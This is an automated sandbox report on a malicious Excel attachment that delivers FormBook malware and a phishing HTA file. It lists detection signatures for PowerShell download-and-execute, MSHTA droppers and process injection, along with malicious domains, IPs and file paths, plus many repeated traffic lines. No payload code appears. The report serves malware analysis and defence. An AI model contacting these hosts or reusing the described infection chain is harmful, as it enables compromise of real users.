Windows Analysis Report
PI-02911202409#.xla.xlsx

Overview

General Information

Sample name: PI-02911202409#.xla.xlsx
Analysis ID: 1566416
MD5: bab0159cad38d589789b94ced5e7439a
SHA1: 34e7944d8c1d559bbae01135adb7c0ab16832465
SHA256: 79c0ec73753eaf5fff4d06717696ff80597b34462c77c425867bdb70ca4c544e
Tags: xlaxlsxuser-abuse_ch
Infos:

Detection

FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: PI-02911202409#.xla.xlsx Virustotal: Detection: 9% Perma Link
Yara detected FormBook
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: PI-02911202409#.xla.xlsx Joe Sandbox ML: detected

Phishing
barindex
Yara detected HtmlPhish44
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemebestgoodluckthings[1].hta, type: DROPPED
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: Binary string: .pdb| source: powershell.exe, 00000008.00000002.512809894.000000001C109000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdb source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.pdbhP source: powershell.exe, 00000008.00000002.506928711.00000000027A4000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000010.00000002.554231034.0000000000A80000.00000040.00001000.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: linkjago.me
Source: global traffic DNS query: name: 1016.filemail.com
Source: global traffic DNS query: name: 1016.filemail.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 172.245.123.12:80
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 188.114.97.6:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 142.215.209.77:443
